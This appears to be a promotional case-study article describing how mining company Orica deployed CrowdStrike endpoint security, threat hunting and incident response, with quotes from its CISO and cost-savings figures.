Even as network links, vulnerabilities and cyber-threats multiply, there are some tools that can automate and streamline many cybersecurity tasks. The trick is combining them with human forethought, awareness, training and follow-up.
For instance, to protect its laptops, devices and mining system endpoints worldwide, Orica Ltd. previously used antivirus software, but CISO Sean Lasinker reports it was complex to support, inefficient and drained resources because it had to be investigated and resolved manually when a new cyber-risk was detected. Endpoint detection, protection and response were basic and slow, and offered minimal visibility and limited threat-hunting. The company supplies explosives, blasting systems, mining chemicals, geotechnical monitoring, digital solutions and services to help clients discover and extract raw materials. Because itās at the forefront of research and development in new mining and blasting technologies, Orica must ensure that related data is safeguarded to protect intellectual property.
āEnsuring our operational technology is used correctly and weāre prepared to respond to a cyberattack is of the utmost importance,ā says Lasinker. āThe intention was always to aim for the next generation of endpoint security as part of our overall security strategy.ā
Automation simplifies the hunt
Orica settled on CrowdStrike due to ease of deployment, ongoing management and seamless integration with existing security and business systems, such as its web-secure gateways and an email security solution. It deployed CrowdStrikeās FalconX automated threat detection in all areas of its IT environment, which must protect digital systems and IIoT products sold to customers, its own business systems hosted on AWS and Azure cloud-computing services, and OT and manufacturing systems that supports its global plants. This environment comprises 8,700 endpoints at Oricaās sites worldwide, including its engineers working at clientsā mining facilities. The company also implemented Falcon OverWatch to manage threat hunting, and CrowdsStrikeās Incident Response and Advisory Service, which let it prepare to react quickly and effectively to any incidents, and assess and thwart potential cyber-threats.
āWeāve already used the CrowdStrike Incident Response and Advisory Service twice to investigate suspected security incidents that were thankfully false positives,ā explained Lasinker. āSpeed of response and resolution were impressive, but more importantly gave us confidence and reassurance. The standout feature of CrowdStrike that makes a difference to our business is its single-pane-of-glass visibility of endpoint security. As a security expert, having that information at my fingertips in real time and being able to act at the click of a button saves lots of time. The visibility we have compared to before is like night and day. With CrowdStrike and way itās has been deployed across Orica, we know we can rely on the accuracy and validity of our data.ā
Lasinker reports another CrowdStrike highlight is its ability to isolate multiple hosts at the same time. It can highlight several endpoints with specific compromise indicators and act swiftly. āCrowdStrike enables us to quickly spot live incidents, gain greater visibility and discover unknown services, which is extremely efficient,ā adds Lasinker. For example, CrowdStrike helped Orica deal with the 2021 Log4Shell threat with no impact. This was a software vulnerability in the Java logging framework, involving arbitrary code execution that affected multiple global organizations.
Security saves time and money
Following its deployment, Orica evaluated CrowdStikeās and found that, over a three-year period, itās expected to save more than $1.5 million Australian, pay for itself in 16.5 months, and deliver a 115% return on investment (ROI). In addition, CrowdStrikeās real-time response and remediation virtually eliminated the three weeks it used to take to recover and rebuild devices for remote workers. Finally, CrowdStrike also reduces the workload of the small team that manages Oricaās global security 24/7, for example, by reducing the four hours previously required to triage an incident down to 10 minutes.
āAs a CISO, there are three aspects of cybersecurity we need to be good at: patching and vulnerability management, regular backups and testing of those backups, and endpoint security. CrowdStrike handles the latter across Oricaās whole enterprise and is a critical security solution for us.ā